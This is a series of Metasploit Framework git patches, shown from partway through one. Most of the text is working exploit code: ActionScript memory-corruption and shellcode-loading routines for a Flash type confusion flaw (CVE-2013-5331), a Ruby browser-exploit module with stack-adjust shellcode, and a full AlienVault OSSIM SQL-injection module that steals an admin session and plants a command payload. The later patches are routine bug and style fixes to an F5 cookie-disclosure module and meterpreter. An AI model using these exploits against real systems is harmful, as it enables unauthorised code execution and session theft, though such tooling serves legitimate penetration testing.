if(uint(vector[index_array_related_addr + 1]) == 0x830850ff) + { + if(uint(vector[index_array_related_addr + 2]) == 0x5d5e0cc4) + { + _loc7_ = 3; + break; + } + } + } + } + + _loc5_ = vector_address + 4 * index_array_related_addr + _loc7_; + return [_loc5_,_loc6_]; + } + + // vector: tweaked vector with 0x40000001 length + // address: address of tweaked vector + function getFileReferenceLocation(vector:*, address:*) : uint { + var flash_address:uint = this.getMemoryAt(vector,address,(address & 0xfffff000) + 28); + var _loc4_:uint = 0; + while(true) + { + _loc4_ = this.getMemoryAt(vector,address,flash_address + 8); + if(_loc4_ == 0x2a0) + { + break; + } + if(_loc4_ < 0x2a0) + { + flash_address = flash_address + 36; + } + else + { + flash_address = flash_address - 36; + } + } + + var file_ref_related_addr:uint = this.getMemoryAt(vector,address,flash_address + 12); + while(this.getMemoryAt(vector,address, file_ref_related_addr + 384) != 0xffffffff) + { + if(this.getMemoryAt(vector,address, file_ref_related_addr + 380) == 0xffffffff) + { + break; + } + file_ref_related_addr = this.getMemoryAt(vector, address, file_ref_related_addr + 8); + } + return file_ref_related_addr; + } + + function getCodeAddress(vector:*, vector_addr:*, mark:*) : uint { + var vector_length_read:uint = 0; + var vector_code_info_addr:uint = this.getMemoryAt(vector, vector_addr,(vector_addr & 0xfffff000) + 0x1c); + while(true) + { + vector_length_read = this.getMemoryAt(vector, vector_addr, vector_code_info_addr + 8); + if(vector_length_read == 2032) // code vector length + { + break; + } + vector_code_info_addr = vector_code_info_addr + 0x24; + } + + var vector_code_contents_addr:uint = this.getMemoryAt(vector, vector_addr, vector_code_info_addr + 0xc); + while(this.getMemoryAt(vector, vector_addr, vector_code_contents_addr + 0x28) != mark) + { + vector_code_contents_addr = this.getMemoryAt(vector, vector_addr, vector_code_contents_addr + 8); + } + return vector_code_contents_addr + 0x2c; // Code address, starting at nops after the mark + } + + // Every vector in the array => 7f0 (header = 8; data => 0x7e8) + function createCodeVectors(mark:uint, nops:uint) : * { + var array:Array = new Array(); + var i:* = 0; + while(i < 8) + { + array[i] = new Vector.(2032 / 4 - 8); + array[i][0] = mark; + array[i][1] = nops; + i++; + } + return array; + } + + function fillCodeVectors(param1:Array, param2:uint) : * { + var i:uint = 0; + var sh:uint=1; + + while(i < param1.length) + { + for(var u:String in shellcodeObj) + { + param1[i][sh++] = Number(shellcodeObj[u]); + } + i++; + sh = 1; + } + } + + } +} + +// Trigger's ActionScript + +/* + +// Action script... + +// [Action in Frame 1] +var b = new flash.display.BitmapData(4, 7); +var filt = new flash.filters.DisplacementMapFilter(b, new flash.geom.Point(1, 2), 1, 2, 3, 4); +var b2 = new flash.display.BitmapData(256, 512); +var filt2 = new flash.filters.DisplacementMapFilter(b2, new flash.geom.Point(1, 2), 1, 2, 3, 4); +var colors = [16777215, 16711680, 16776960, 52479]; +var alphas = [0, 1, 1, 1]; +var ratios = [0, 63, 126, 255]; +var ggf = new flash.filters.GradientGlowFilter(0, 45, colors, alphas, ratios, 55, 55, 2.500000, 2, "outer", false); +var cmf = new flash.filters.ColorMatrixFilter([]); +MyString2.setCMF(cmf); +MyString1.setGGF(ggf); +flash.filters.ColorMatrixFilter.prototype.resetMe = _global.ASnative(2106, 302); +zz = MyString1; +flash.display.BitmapData = zz; +arr = new Array(); +var i = 0; +while (i < 8192) +{ + arr[i] = new Number(0); + ++i; +} // end while +var i = 100; +while (i < 8192) +{ + arr[i] = "qwerty"; + i = i + 8; +} // end while +k = filt.mapBitmap; +zz = MyString2; +flash.display.BitmapData = zz; +k = filt.mapBitmap; +cmf_matrix = cmf.matrix; +cmf_matrix[4] = 8192; +cmf_matrix[15] = 12.080810; +cmf.matrix = cmf_matrix; +ggf_colors = ggf.colors; +ggf_alphas = ggf.alphas; +mem = new Array(); +var i = 0; +while (i < ggf_alphas.length) +{ + ggf_alphas[i] = ggf_alphas[i] * 255; + ++i; +} // end while +for (i = 0; i < ggf_colors.length; i++) +{ + mem[i] = ggf_colors[i] + ggf_alphas[i] * 16777216; +} // end of for +ggf.colors = colors; +ggf.alphas = alphas; +ggf.ratios = ratios; +var lc = new LocalConnection(); +lc.send("toAS3", "as2loaded", mem); +zz = cmf; +zz.resetMe("b", 1, 1, 1); + + +class MyString1 extends String +{ + static var ggf; + function MyString(a,b) + { + super(); + } + + static function setGGF(myggf) + { + ggf = myggf; + } + + static function getGGF() + { + return (MyString1.ggf); + } +} + +class MyString2 extends String +{ + static var cmf; + function MyString2(a,b) + { + super(); + } + + static function setCMF(mycmf) + { + cmf = mycmf; + } + + static function getCMF() + { + return (MyString2.cmf); + } +} + + +*/ diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb new file mode 100644 index 0000000000..7e08ea356e --- /dev/null +++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb @@ -0,0 +1,131 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Adobe Flash Player Type Confusion Remote Code Execution", + 'Description' => %q{ + This module exploits a type confusion vulnerability found in the ActiveX + component of Adobe Flash Player. This vulnerability was found exploited + in the wild in November 2013. This module has been tested successfully + on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170 + over Windows XP SP3 and Windows 7 SP1. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery and exploit int he wild + 'bannedit', # Exploit in the wild discovery, analysis and reporting + 'juan vazquez' # msf module + ], + 'References' => + [ + [ 'CVE', '2013-5331' ], + [ 'OSVDB', '100774'], + [ 'BID', '64199'], + [ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb13-28.html' ], + [ 'URL', 'http://blog.malwaretracker.com/2014/01/cve-2013-5331-evaded-av-by-using.html' ] + ], + 'Payload' => + { + 'Space' => 2000, + 'DisableNops' => true, + 'PrependEncoder' => stack_adjust + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f', + 'Retries' => false, + 'EXITFUNC' => "thread" + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", + :method => "LoadMovie", + :os_name => Msf::OperatingSystems::WINDOWS, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^11\.[7|8|9]/ && ver < '11.9.900.170' } + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Dec 10 2013", + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def stack_adjust + adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb + adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit + adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit + adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset + + adjust + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status("Sending SWF...") + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) + return + end + + print_status("Sending HTML...") + tag = retrieve_tag(cli, request) + profile = get_profile(tag) + profile[:tried] = false unless profile.nil? # to allow request the swf + print_status("showme the money") + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + flash_payload = "" + get_payload(cli,target_info).unpack("V*").each do |i| + flash_payload << "0x#{i.to_s(16)}," + end + flash_payload.gsub!(/,$/, "") + + + html_template = %Q| + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-5331", "Exploit.swf" ) + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end From 0bca3a2d54aaa63cd798cc41b4f4d97f00951708 Mon Sep 17 00:00:00 2001 From: nstarke Date: Sun, 27 Apr 2014 20:31:32 +0000 Subject: [PATCH 169/853] POST module duplicate search results MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Running a POST module in meterpreter was causing duplicate search results for the executed module. For example, running post/windows/gather/checkvm would produce duplicate results for that module when executing “search checkvm” in msf. Debugging revealed that the cmd_exec function in meterpreter’s ui command_dispatcher core was creating the specified module, and then promptly reloading it. The reload function was causing the duplicate module_detail record to be written to the msg postgres database instance. Further analysis revealed that the “original_mod” could be used for running the post module, so the “reloaded_mod” was removed and the “original_mod” used in it’s place to run the post module. SeeRM #8754 --- .../post/meterpreter/ui/console/command_dispatcher/core.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 6766ce7e7f..b0d16da36d 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -542,9 +542,8 @@ class Console::CommandDispatcher::Core # fall back to using the scripting interface. if (msf_loaded? and mod = client.framework.modules.create(script_name)) original_mod = mod - reloaded_mod = client.framework.modules.reload_module(original_mod) - unless reloaded_mod + unless original_mod error = client.framework.modules.module_load_error_by_path[original_mod.file_path] print_error("Failed to reload module: #{error}") @@ -552,7 +551,7 @@ class Console::CommandDispatcher::Core end opts = (args + [ "SESSION=#{client.sid}" ]).join(',') - reloaded_mod.run_simple( + original_mod.run_simple( #'RunAsJob' => true, 'LocalInput' => shell.input, 'LocalOutput' => shell.output, From 9ce5545034f944c9b10e1a8adab75129a475b019 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 27 Apr 2014 20:13:46 -0500 Subject: [PATCH 170/853] Fix comments --- .../windows/browser/adobe_flash_filters_type_confusion.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb index 7e08ea356e..ff8a3f4549 100644 --- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb +++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb @@ -23,8 +23,8 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Unknown', # Vulnerability discovery and exploit int he wild - 'bannedit', # Exploit in the wild discovery, analysis and reporting + 'Unknown', # Vulnerability discovery and exploit in the wild + 'bannedit', # Exploit in the wild discoverer, analysis and reporting 'juan vazquez' # msf module ], 'References' => From 2e04bc9e4e6d6e4bba32de9af0dc72c443f1c769 Mon Sep 17 00:00:00 2001 From: xistence Date: Mon, 28 Apr 2014 10:59:15 +0700 Subject: [PATCH 171/853] AlienVault OSSIM 4.3.1 unauthenticated SQLi RCE --- .../unix/webapp/alienvault_sqli_exec.rb | 334 ++++++++++++++++++ 1 file changed, 334 insertions(+) create mode 100644 modules/exploits/unix/webapp/alienvault_sqli_exec.rb diff --git a/modules/exploits/unix/webapp/alienvault_sqli_exec.rb b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb new file mode 100644 index 0000000000..8c7653c8a5 --- /dev/null +++ b/modules/exploits/unix/webapp/alienvault_sqli_exec.rb @@ -0,0 +1,334 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "AlienVault OSSIM SQL Injection and Remote Code Execution", + 'Description' => %q{ + This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault + OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an + active admin session ID. If an administrator level user is identified, remote code execution + can be gained by creating a high priority policy with an action containing our payload. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Sasha Zivojinovic', # SQLi discovery + 'xistence ' # Metasploit module + ], + 'References' => + [ + ], + 'DefaultOptions' => + { + 'SSL' => true + }, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'RequiredCmd' => 'generic perl ruby python bash', + } + }, + 'Targets' => + [ + ['Alienvault OSSIM', {}] + ], + 'Privileged' => true, + 'DisclosureDate' => "Apr 28 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(443), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/']) + ], self.class) + end + + + def check + # Check version + vprint_status("#{peer} - Trying to detect vulnerable OSSIM") + + marker = rand_text_alpha(6) + sqlirand = rand_text_numeric(4+rand(4)) + sqli = "' and(select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(user() as char)),0x#{marker.unpack('H*')[0]})) " + sqli << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1" + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), + 'vars_get' => { 'date_from' => sqli } + }) + + if res and res.code == 200 and res.body =~ /#{marker}726F6F74403132372E302E302E31#{marker}/ # 726F6F74403132372E302E302E31 = root@127.0.0.1 + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + + end + + + def exploit + marker = rand_text_alpha(6) + sqlirand = rand_text_numeric(4+rand(4)) + sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) " + sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqlirand}'='#{sqlirand}" + + print_status("#{peer} - Trying to grab admin session through SQLi") + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), + 'vars_get' => { 'date_from' => sqli } + }) + + if res and res.code == 200 and res.body =~ /#{marker}(.*)#{marker}/ + adminsession = $1 + @cookie = "PHPSESSID=" + ["#{adminsession}"].pack("H*") + print_status("#{peer} - Admin session cookie is [ #{@cookie} ]") + else + fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session") + end + + # Creating an Action containing our payload, which will be executed by any event (not only alarms) + action = rand_text_alpha(8+(rand(8))) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "ossim", "action", "modifyactions.php"), + 'cookie' => @cookie, + 'vars_post' => { + 'action' => 'new', + 'action_name' => action, + 'descr' => action, + 'action_type' => '2', + 'only' => 'on', + 'cond' => 'True', + 'exec_command' => payload.encoded + } + }) + + if res and res.code == 200 + print_status("#{peer} - Created Action [ #{action} ]") + else + fail_with(Failure::Unknown, "#{peer} - Action creation failed!") + end + + # Retrieving the Action ID, used to clean up the action after succesful exploitation + post_vars = "page=1&rp=2000" + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"), + 'cookie' => @cookie, + 'data' => post_vars + }) + + if res and res.code == 200 and res.body =~ /actionform.php\?id=(.*)'>#{action}/ + @actionid = $1 + print_status("#{peer} - Action ID is [ #{@actionid} ]") + else + fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!") + end + + # Retrieving the policy data, necessary for proper cleanup after succesful exploitation + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "policy.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'm_opt' => 'configuration', + 'sm_opt' => 'threat_intelligence', + 'h_opt' => 'policy' + } + }) + + if res and res.code == 200 and res.body =~ /getpolicy.php\?ctx=(.*)\&group=(.*)',/ + policyctx = $1 + policygroup = $2 + print_status("#{peer} - Policy data [ ctx=#{policyctx} ] and [ group=#{policygroup} ] retrieved!") + else + fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!") + end + + # Creating policy which will be triggered by any source/destination + policy = rand_text_alpha(8+(rand(8))) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"), + 'cookie' => @cookie, + 'vars_post' => { + 'descr' => policy, + 'active' => '1', + 'group' => policygroup, + 'ctx' => policyctx, + 'order' => '1', # Makes this the first policy, overruling all the other policies + 'action' => 'new', + 'sources[]' => '00000000000000000000000000000000', # Source is ANY + 'dests[]' => '00000000000000000000000000000000', # Destination is ANY + 'portsrc[]' => '0', # Any source port + 'portdst[]' => '0', # Any destination port + 'plug_type' => '0', # Any plugin type + 'plugins[0]' => 'on', + 'tax_pt' => '0', + 'tax_cat' => '0', + 'tax_subc' => '0', + 'mboxs[]' => '00000000000000000000000000000000', + 'rep_act' => '0', + 'rep_sev' => '1', + 'rep_rel' => '1', + 'rep_dir' => '0', + 'ev_sev' => '1', + 'ev_rel' => '1', + 'tzone' => 'Europe/Amsterdam', + 'date_type' => '1', + 'begin_hour' => '0', + 'begin_minute' => '0', + 'begin_day_week' => '1', + 'begin_day_month' => '1', + 'begin_month' => '1', + 'end_hour' => '23', + 'end_minute' => '59', + 'end_day_week' => '7', + 'end_day_month' => '31', + 'end_month' => '12', + 'actions[]' => @actionid, + 'sim' => '1', + 'priority' => '1', + 'qualify' => '1', + 'correlate' => '0', # Don't make any correlations + 'cross_correlate' => '0', # Don't make any correlations + 'store' => '0' # We don't want to store anything :) + } + }) + + if res and res.code == 200 + print_status("#{peer} - Created Policy [ #{policy} ]") + else + fail_with(Failure::Unknown, "#{peer} - Policy creation failed!") + end + + # Retrieve policy ID, needed for proper cleanup after succesful exploitation + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "getpolicy.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'ctx' => policyctx, + 'group' => policygroup + }, + 'vars_post' => { + 'page' => '1', + 'rp' => '2000' + } + }) + if res and res.code == 200 and res.body =~ /row id='(.*)' col_order='1'/ + @policyid = $1 + print_status("#{peer} - Policy ID [ #{@policyid} ] retrieved!") + else + fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!") + end + + # Reload the policies to make our new policy active + policy = rand_text_alpha(8) + print_status("#{peer} - Reloading Policies") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'what' => 'policies', + 'back' => '../policy/policy.php' + } + }) + + if res and res.code == 200 + print_status("#{peer} - Policies reloaded!") + else + fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") + end + + + # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. + dontexist = rand_text_alpha(8+rand(4)) + print_status("#{peer} - Triggering policy and action by requesting a non existing url") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, dontexist), + 'cookie' => @cookie + }) + + if res and res.code == 404 + print_status("#{peer} - Payload delivered") + else + fail_with(Failure::Unknown, "#{peer} - Payload failed!") + end + + end + + + def cleanup + # Clean up, retrieve token so that the policy can be removed + print_status("#{peer} - Cleaning up") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), + 'cookie' => @cookie, + 'vars_post' => { 'f_name' => 'delete_policy' } + }) + + if res and res.code == 200 and res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ + token = $1 + print_status("#{peer} - Token [ #{token} ] retrieved") + else + print_warning("#{peer} - Unable to retrieve token") + end + + # Remove our policy + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "policy", "deletepolicy.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'confirm' => 'yes', + 'id' => @policyid, + 'token' => token + } + }) + + if res and res.code == 200 + token = $1 + print_status("#{peer} - Policy ID [ #{@policyid} ] removed") + else + print_warning("#{peer} - Unable to remove Policy ID") + end + + # Remove our action + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "action", "deleteaction.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'id' => @actionid, + } + }) + + if res and res.code == 200 + token = $1 + print_status("#{peer} - Action ID [ #{@actionid} ] removed") + else + print_warning("#{peer} - Unable to remove Action ID") + end + + end + +end From 328acc44faf8d999dcc533e809d4cb752f6587f9 Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 11:32:46 +0200 Subject: [PATCH 172/853] Start cleaning as requested --- .../scanner/http/f5_bigip_cookie_disclosure.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb index 9ac2c2e550..e7dac22d2b 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb @@ -14,10 +14,10 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'F5 Bigip Backend IP/PORT Cookie Disclosure.', 'Description' => %q{ - This module identify F5 BigIP SLB and decode sticky cookies wich leak + This module identify F5 BigIP SLB and decode sticky cookies which leak backend IP and port. }, - 'Author' => [ 'Thanat0s ' ], + 'Author' => [ 'Thanat0s ' ], 'References' => [ ['URL', 'http://support.f5.com/kb/en-us/solutions/public/6000/900/sol6917.html'], @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary return host,port end - def get_cook # request a page and exctract a F5 looking cookie. + def get_cookie # request a page and extract a F5 looking cookie. res = send_request_raw({ 'method' => 'GET', 'uri' => @uri @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary begin # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" m = res.headers['Set-Cookie'].match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) - ensure + ensure id = (m.nil?) ? nil : m[1] value = (m.nil?) ? nil : m[2] return id, value @@ -66,9 +66,9 @@ class Metasploit3 < Msf::Auxiliary host_port = Hash.new @uri = normalize_uri(target_uri.path) print_status("Starting request #{@uri}") - id, value = get_cook() + id, value = get_cookie() if id - print_status "F5 cookie \"#{id}\" found" + print_status ("F5 cookie \"#{id}\" found") host, port = cookie_decode(value) host_port[host+":"+port] = true print_status "Backend #{host}:#{port}" From d5fe8471ed02c72e6cd59e1f408006ba73b677af Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 12:16:49 +0200 Subject: [PATCH 173/853] unless id --- .../http/f5_bigip_cookie_disclosure.rb | 56 +++++++++---------- 1 file changed, 28 insertions(+), 28 deletions(-) diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb index e7dac22d2b..60d811b3b3 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb @@ -51,11 +51,11 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', 'uri' => @uri }) - + begin # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" m = res.headers['Set-Cookie'].match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) - ensure + ensure id = (m.nil?) ? nil : m[1] value = (m.nil?) ? nil : m[2] return id, value @@ -67,33 +67,33 @@ class Metasploit3 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) print_status("Starting request #{@uri}") id, value = get_cookie() - if id - print_status ("F5 cookie \"#{id}\" found") - host, port = cookie_decode(value) - host_port[host+":"+port] = true - print_status "Backend #{host}:#{port}" - i=1 # We already have done one request - until i == datastore['RETRY'] - id, value = get_cook() - host, port = cookie_decode(value) - if ! host_port.has_key? host+":"+port - host_port[host+":"+port] = true - print_status "Backend #{host}:#{port}" - end - i += 1 - end - # Reporting found backend in database - backends = Array.new - host_port.each do |key, value| - backends.push key - end - report_note( - :host => datastore['RHOST'], - :type => "F5_Cookie_Backends", - :data => backends - ) - else + unless id print_error "F5 SLB cookie not found" + return end + print_status ("F5 cookie \"#{id}\" found") + host, port = cookie_decode(value) + host_port[host+":"+port] = true + print_status "Backend #{host}:#{port}" + i=1 # We already have done one request + until i == datastore['RETRY'] + id, value = get_cookie() + host, port = cookie_decode(value) + if ! host_port.has_key? host+":"+port + host_port[host+":"+port] = true + print_status "Backend #{host}:#{port}" + end + i += 1 + end + # Reporting found backend in database + backends = Array.new + host_port.each do |key, value| + backends.push key + end + report_note( + :host => datastore['RHOST'], + :type => "F5_Cookie_Backends", + :data => backends + ) end end From 6610977e86878b324df92fc7cf4686cc7ccef9ea Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 12:39:32 +0200 Subject: [PATCH 174/853] add cookie.match and alway return --- modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb index 60d811b3b3..c5bcbe59f9 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb @@ -52,13 +52,14 @@ class Metasploit3 < Msf::Auxiliary 'uri' => @uri }) + id,value = nil begin # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" - m = res.headers['Set-Cookie'].match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) + m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) ensure id = (m.nil?) ? nil : m[1] value = (m.nil?) ? nil : m[2] - return id, value + return id, value end end From f34cfefb8f0aab9a2ff6df558cc277a793a8e459 Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 12:52:46 +0200 Subject: [PATCH 175/853] Change hash to array --- .../scanner/http/f5_bigip_cookie_disclosure.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb index c5bcbe59f9..73d89164c2 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary end def run - host_port = Hash.new + host_port = Array.new @uri = normalize_uri(target_uri.path) print_status("Starting request #{@uri}") id, value = get_cookie() @@ -74,22 +74,22 @@ class Metasploit3 < Msf::Auxiliary end print_status ("F5 cookie \"#{id}\" found") host, port = cookie_decode(value) - host_port[host+":"+port] = true + host_port.push(host+":"+port) print_status "Backend #{host}:#{port}" i=1 # We already have done one request until i == datastore['RETRY'] id, value = get_cookie() host, port = cookie_decode(value) - if ! host_port.has_key? host+":"+port - host_port[host+":"+port] = true + unless host_port.include? (host+":"+port) + host_port.push(host+":"+port) print_status "Backend #{host}:#{port}" end i += 1 end # Reporting found backend in database backends = Array.new - host_port.each do |key, value| - backends.push key + host_port.each do |key| + backends.push (key) end report_note( :host => datastore['RHOST'], From 3bfa8ea707273248a5168a9dba51d95c81de2fca Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 12:53:49 +0200 Subject: [PATCH 176/853] Pass msftidy --- modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb index 73d89164c2..a174f77928 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb @@ -51,7 +51,6 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', 'uri' => @uri }) - id,value = nil begin # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" From 2396d497d8d3190bd0057f946b1378309673bb88 Mon Sep 17 00:00:00 2001 From: Thanat0s Date: Mon, 28 Apr 2014 12:57:54 +0200 Subject: [PATCH 177/853] move scanner to gather --- .../{scanner/http => gather}/f5_bigip_cookie_disclosure.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/{scanner/http => gather}/f5_bigip_cookie_disclosure.rb (100%) diff --git a/modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb similarity index 100% rename from modules/auxiliary/scanner/http/f5_bigip_cookie_disclosure.rb rename to modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb From fb39e422aa52f4e41b7258d7432341cbe34b4c7e Mon Sep 17 00:00:00 2001 From: Zinterax Date: Mon, 28 Apr 2014 09:28:29 -0400 Subject: [PATCH 178/853] Fix smb_login calling nonexistent method When a Rex::Proto::SMB::Exceptions::InvalidWordCount exception is thrown by this module, it attempts to call the nonexistent method error_reason and throws a NoMethodError: Auxiliary failed: NoMethodError undefined 